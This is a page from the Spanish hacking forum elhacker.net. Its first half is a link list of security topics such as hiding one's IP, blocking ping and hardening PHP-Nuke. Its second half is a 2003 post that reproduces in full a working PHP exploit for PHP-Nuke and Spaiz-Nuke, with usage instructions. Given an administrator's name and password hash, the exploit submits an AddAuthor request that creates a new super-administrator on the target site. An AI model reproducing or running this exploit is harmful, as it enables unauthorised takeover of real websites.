http://foro.elhacker.net/dudas_generales/evitar_los_dialers-t21190.0.html

http://foro.elhacker.net/redes/bloquear_dialers-t15334.0.html




Citar
Ocultar mi ip, navegar anónimo, etc

Tutorial como Instalar Proxie en Firefox y Internet Explorer
http://foro.elhacker.net/tutoriales_documentacion/tutorial_como_instalar_proxie_en_firefox_y_internet_explorer-t50170.0.html

Proteger mi ip de curiosos
http://foro.elhacker.net/redes/proteger_mi_ip_de_curiosos-t14044.0.html

Ser anonimo en la red?
http://foro.elhacker.net/hacking_basico/ser_anonimo_en_la_red-t27484.0.html

ip oculta
http://foro.elhacker.net/hacking_basico/ip_oculta-t26919.0.html

Komo puedo eskonder mi IP ??
http://foro.elhacker.net/chats_irc_y_messengers/komo_puedo_eskonder_mi_ip-t3484.0.html



Citar
Variado

Protección contra la ingenieria social
http://foro.elhacker.net/seguridad/proteccion_contra_la_ingenieria_social-t311058.0.html

Arquitectura cliente-servidor ssh2 para win2
http://foro.elhacker.net/seguridad/arquitectura_clienteservidor_ssh2_para_win2-t42037.0.html

Contraseñaa una Carpeta
http://foro.elhacker.net/seguridad/contrasenaa_una_carpeta-t20245.0.html

como ponerle contraseña a una carpeta?
http://foro.elhacker.net/seguridad/como_ponerle_contrasena_a_una_carpeta-t17207.0.html

como ponerle pass a un archivo? sin software especial
http://foro.elhacker.net/seguridad/como_ponerle_pass_a_un_archivo-t14347.0.html

Introduccion y Manuales PGP - GNUPG
http://foro.elhacker.net/seguridad/introduccion_y_manuales_pgp_gnupg-t12688.0.html

el pgp pone contraseñas a las carpetas?
http://foro.elhacker.net/seguridad/el_pgp_pone_contrasenas_a_las_carpetas-t25197.0.html

Archivo SVCHOST.EXE
http://www.elhacker.net/archivo-SVCHOST.html

Comprobar archivos con MD5
http://foro.elhacker.net/gnulinux/md5-t22105.0.html

Configuración de Internet Explorer
http://foro.elhacker.net/tutoriales_documentacion/configuracion_de_internet_explorer-t119742.0.html

¿Qué es el archivo Hosts?
http://foro.elhacker.net/seguridad/iquestque_es_el_archivo_hosts-t135865.0.html

cómo podemos matener nuestra makina como offline cuando nos hacen ping???
http://foro.elhacker.net/hacking_basico/como_podemos_matener_nuestra_makina_como_offline_cuando_nos_hacen_ping-t2012.0.html

Información sobre "ping":
http://foro.elhacker.net/hacking_basico/respuestas_echo_reply-t18779.0.html

TCP/IP:
http://foro.elhacker.net/hacking_basico/respuestas_echo_reply-t430.0.html

respuestas -echo reply-
http://foro.elhacker.net/hacking_basico/respuestas_echo_reply-t18779.0.html

Denegar ICMP en Linux con iptables
http://foro.elhacker.net/gnulinux/ayuda-t18579.0.html

Rechazar ICMP
http://foro.elhacker.net/seguridad/rechazar_icmp-t17022.0.html

Evitar Ping con iptables
http://foro.elhacker.net/hacking_linuxunix/evitar_ping_con_iptables-t57229.0.html

Como bloqueo mi reply ping
http://foro.elhacker.net/seguridad/como_bloqueo_mi_reply_ping-t11917.0.html




Citar
Seguridad XP

SOBRE EL FIREWALL DE XP - SP2
http://foro.elhacker.net/seguridad/sobre_el_firewall_de_xp_sp2-t47822.0.html

Que opinais del firewall del XP?
http://foro.elhacker.net/seguridad/que_opinais_del_firewall_del_xp-t14052.0.html

Trucos XP
http://www.elhacker.net/trucosxp.htm

Windows Update
http://update.microsoft.com

Microsoft TechNet Seguridad
http://technet.microsoft.com/es-es/security/default.aspx





Citar
Abrir puertos Router

[Manual] Abrir puertos a los Routers
http://foro.elhacker.net/redes/manualabrir_puertos_a_los_routers-t91300.0.html

Abrir puertos en un Router
http://foro.elhacker.net/redes/abrir_puertos_en_un_router-t27520.0.html

Abrir PUERTOS "ADSL"
http://foro.elhacker.net/redes/abrir_puertos_adsl-t11059.0.html

abrir puertos dl router
http://foro.elhacker.net/redes/abrir_puertos_dl_router-t27588.0.html

ROUTER ZYXEL PRESTIGE 650 HW MULTIPUESTO IP DINAMICA
http://foro.elhacker.net/redes/router_zyxel_prestige_650_hw_multipuesto_ip_dinamica-t25100.0.html



Citar
Low id con emule

Configurar Blackice correctamente para Emule etc
http://foro.elhacker.net/seguridad/configurar_blackice_correctamente_para_emule_etc-t26091.0.html

¿Cómo evito tener ID BAJA o LOWID en el eMule?
http://www.adslzone.net/emule_id.html



Citar
Proteger, asegurar una web Php-Nuke, postnuke, etc

[[Seguridad]] Guias de Proteccion para Host!
http://foro.elhacker.net/seguridad/seguridad_guias_de_proteccion_para_host-t134066.0.html

Seguridad en Apache: mod_security y mod_evasive
http://foro.elhacker.net/seguridad/seguridad_en_apache_modsecurity_y_modevasive-t181694.0.html

Guía de seguridad en PHP (Capítulo primero)
http://www.php-hispano.net/articulos/guia-de-seguridad-en-php-1.html

Top Ten de vulnerabilidades en PHP
http://www.sklar.com/page/article/owasp-top-ten

Fallos de seguridad en Php
http://foro.elhacker.net/desarrollo_web/fallos_de_seguridad_en_php-t102506.0.html

BLOQUEO DE ATAQUES XSS Y SQL INJECTION A PAGINAS WEB PHP BAJO HOSTING
http://foro.elhacker.net/seguridad/bloqueo_de_ataques_xss_y_sql_injection_a_paginas_web_php_bajo_hosting-t45693.0.html

Evitar inyección de SQL en PHP
http://foro.elhacker.net/desarrollo_web/evitar_inyeccion_de_sql_en_php-t32862.0.html

http://es.php.net/magic_quotes

Evadiendo algunas protecciones anti XSS en ASP (texto ingles)
http://foro.elhacker.net/hacking_basico/evadiendo_algunas_protecciones_anti_xss_en_asp_texto_ingles-t37061.0.html

Security measures
http://www.phpnuke.org/modules.php?name=PHP-Nuke_HOWTO&page=security-measures.html

PROTEGAN PHP-NUKE DE UNA VEZ POR TODAS!
http://foro.elhacker.net/desarrollo_web/protegan_phpnuke_de_una_vez_por_todas-t45367.0.html

PHP-NUKE | BUGS -DEFACEMENT | PHP-NUKE
http://foro.elhacker.net/hacking_basico/phpnuke_bugs_defacement_phpnuke-t30665.0.html

http://www.nukecops.com
http://www.truzone.org
http://www.nukesecurity.com
http://www.joomlaos.net/intrusion-de-hackers-en-tu-sistema-mambo-joomla.php




+ Seguridad Informatica [Capitulo 1º y 2º]

http://foro.elhacker.net/seguridad/seguridad_informatica_capitulo_1ordm_y_2ordm-t255294.0.html

+ Seguridad Informatica [Capitulo 3º y 4º )
http://foro.elhacker.net/seguridad/seguridad_informatica_capitulo_3ordm_y_4ordm-t255399.0.html
330  Seguridad Informática / Nivel Web / exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones.... en: 10 Octubre 2003, 16:32 pm
Citar
exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones y Spainz-Nuke en PHP

blade ha escrito un exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones y Spainz-Nuke en PHP, lo ha probado con las versiones Oficiales de PHP-Nuke y funciona perfectamente :D.... Crea un administrador en el Portal vulnerable, a base de tener el nombre actual de el administrador y su password en MD5, un derivado del bug...


Código:
<?php
/*             PHP-Nuke & Spaiz-Nuke SQL Injection Exploit
                              By
            BBBBBBBB    lll    aaaaaaaa    ddddddd    eeeeeeeee
            BBBBBBBBB   lll    aaaaaaaaa  ddddddddde  eeeeeeeee
           BBBBBBBBBB  lll     aaaaaaaaad ddddddddde eeeeeeeeee
                  BBB  lll            aad         de
                  BBB  lll    aaaaaaaaaad        dde eeeeeeeeee
           BBBBBBBBBB  lll    aaaaaaaaaad ddd    dde eeeeeeeeee
          BBBBBBBBBB   lll    aaaaaaaaaa ddd     ddeeeeeeeeeeee
          BBBBBBBBBB  lll     aaa    aaa ddd    dddeeee
          BBB    BBB  lll     aaa    aaa ddd    ddd eee
          BBB   BBBB  lll    aaa     aaa ddd    ddd eee
          BBBBBBBBB   lllllllaaa         dddddddddd eeeeeeeeee
         BBBBBBBBB     llllllaaa        ddddddddddd  eeeeeeeee
         BBBBBBBB       lllll aa        dddddddddd    eeeeeee
                          <blade@abez.org>

|Blade «blade@abez.org»|
###www.abez.org Of AbeZ
##www.rzw.com.ar By XyborG
#www.fihezine.tsx.to Of FiH eZine
*/
 echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>
      <title>PHP-Nuke &amp; Spaiz-Nuke Injection Exploit v1.0 By Blade</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><STYLE type=text/css>
      .bginput  { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
      A:link    { COLOR: #000066; TEXT-DECORATION: none }
      A:visited { COLOR: #000066; TEXT-DECORATION: none }
      A:active  { COLOR: #000066; TEXT-DECORATION: none }
      A:hover   { COLOR: #000066; TEXT-DECORATION: none }
      .button   { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
      </STYLE></head><body>';
     
 if (($action == "go") and ($server) and ($add_name) and ($add_email) and ($add_aid)){

        $admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
        $server = chop($server); $add_pwd = chop($add_pwd);
        $hash = $admin_name . ":" . $admin_hash . ":";
        $hash = base64_encode($hash);
       
 echo "<form name='add' method='get' action='http://" . $server . "/admin.php'>
       <input type='hidden' name='op' value='AddAuthor'>
       <input type='hidden' name='add_name' value='" . $add_name . "'>
       <input type='hidden' name='add_aid' value='" . $add_aid . "'>
       <input type='hidden' name='add_email' value='" . $add_email . "'>
       <input type='hidden' name='add_url' value='" . $add_url . "'>
       <input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
       <input type='hidden' name='add_radminsuper' value='" . $add_radminsuper . "'>
       <input type='hidden' name='admin' value=" . $hash .">
       <center><font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
       vulnerable : <strong>http://" . $server . "</strong> . <br>Clave Hash : <strong>" .
       $hash . "</strong> . <br>New Administrator : <strong>" . $add_name . "</strong>.
       In case that these data are not correct he returns from
       <a href='javascript:history.back()'><strong>«Here»</strong></a>.</font>
       <br><br><font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
       continue la operacion agregando el nuevo Administrador.</b></font></center>
       <center><input name='AddSysop' type='submit' id='AddSysop' value='Agregar Administrador' class='button'></center>
       </form>";
                             
 } else {
 
 echo'<FORM action="' . $PHP_Self . '" method=post>
      <p align="center"><u><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
      <input name="action" type="hidden" id="action" value="go">
      </font></strong></u></p>
      <div align="center">
      <TABLE width="65%" border=0 align="center" cellPadding=0 cellSpacing=0>
      <TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif">Servidor
      Vulneable:</font></strong></div></TD>
      </TR>
      <TR>
      <TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion
      Servidor:</strong></font></div></TD>
      <TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD>
      <TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      </font>
      <input name="server" type="text" class="bginput" id="server" value="www.">
      </div></TD>
      </TR>
      <TR>
      <TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre
      Admin :</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_name" type="text" id="admin_name" class="bginput">
      </p></TD>
      </TR>
      <TR>
      <TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password
          MD5:</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_hash" type="text" id="admin_hash" size="50" class="bginput">
      </p></TD>
      </TR>
      </TABLE>
      <br>
      </div>
      <TABLE width="50%" border=0 align="center">
      <TBODY>
      <TR>
      <TD colspan="2"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif">Datos
      de la Cuenta:</font></strong></div></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=50 size=30 name=add_name class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nickname:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=30 size=30 name=add_aid class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">E-Mail:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=60 size=30 name=add_email class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">URL:</font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT name=add_url class="bginput" value="http://www." size=30 maxLength=60>
      <strong>
      <input name="add_radminsuper" type="hidden" id="add_radminsuper" value="1">
      </strong> </font></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password:</font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
      <FONT class=tiny><strong>(Obligatorio)</strong></FONT></font></TD>
      </TR>
      <INPUT type=hidden value=AddAuthor name=op>
      <TR>
      <TD>&nbsp;</TD>
      </TR>
      </TABLE>
      <div align="center">
      <p align="center">
      <INPUT name="submit" type=submit value="Crear Administrador" class="button">
      </p>
      </FORM>';
     
 } if ($action != "go"){
 
 echo'<div align="center"><u><font size="2" face="Verdana, Arial, Helvetica, sans-serif"></font></u></div>
      <table width="100%" border="0" align="center">
      <tr>
      <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Como
      Usar: </strong></font></div><td>
      </tr>
      <tr>
      <td width="18%"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Direccion
      Servidor :</font></strong></td>
      <td width="82%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es
      la URL correspondiente al Portal vulnerable en PHP-Nuke. Ejemplo: www.phpnuke.org.</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nombre
      Admin :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es la identidad
      en valor de nombre, del administrador del cual se conoce el password cifrado.
      Ejemplo : xMan.</font></td>
      </tr>
      <tr>
     
    <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Password
      MD5 :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el password
      cifrado en MD5 del administrador, cuyo nombre se conoce. Ejemplo: QmxhZGU6MWVhNTJmMjZlN2UwY2UwOGU0NjJmODdmNWUzNTA5NmM6</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nombre
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el nombre
      correspondiente al nuevo Administrador a crear. Ejemplo: BaxGo.</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nickname
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el Nick
      o Apodo, figurante para el nuevo administrador. Ejemplo: SysBack </font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;E-Mail
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el E-mail
      que figurar&aacute; en la nueva cuenta del Administrador. Ejemplo: sysback@phpnuke..com</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;URL
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es la URL
      del Website del nuevo administrador. </font></td>
      </tr>
      <tr>
      <td height="14"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Password
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el password,
      del cual el nuevo Administrador depender&aacute; para ingresar en su futura
      cuenta. </font></td>
      </tr>
      </table>
      <br>
      <div align="center">
      <table width="45%" border="0">
      <tr>
      <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Referencias:</strong></font></div></td>
      </tr>
      <tr>
      <td width="47%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
      Informacion De :</font></div></td>
      <td width="53%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://rst.void.ru/texts/advisory10.htm" target="_blank">http://rst.void.ru</a>
      </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Mas
      Informacion</strong> De :</font></div></td>
      <td><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.rzw.com.ar/article895.html" target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.security.nnov.ru/search/document.asp?docid=5201" target="_blank">http://www.security.nnov.ru</a></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.securityfocus.com/archive/1/340664" target="_blank">http://www.securityfocus.com</a></font><font size="1" face="Verdana, Arial, Helvetica, sans-serif"></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.cyruxnet.com.ar/phpnuke_modules.htm" target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
      </tr>
      </table>';

 }
       
 echo'<center><p><font color="#003366" size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="mailto:blade@abez.org"><strong><u>PHP-Nuke
      &amp; Spaiz-Nuke SQL Injection Exploit By Blade.</u></strong></a></font></p></center>
      </div>
      </body>
      </html>';
?>


+ Info
http://cyruxnet.com.ar/phpnuke_modules.htm



¿Cómo parchear?

http://www.phpsecure.info/


Otras:
http://www.securityfocus.com/bid/8764
http://www.securityfocus.com/bid/8798
Páginas: 1 ... 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [33] 34 35 36
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines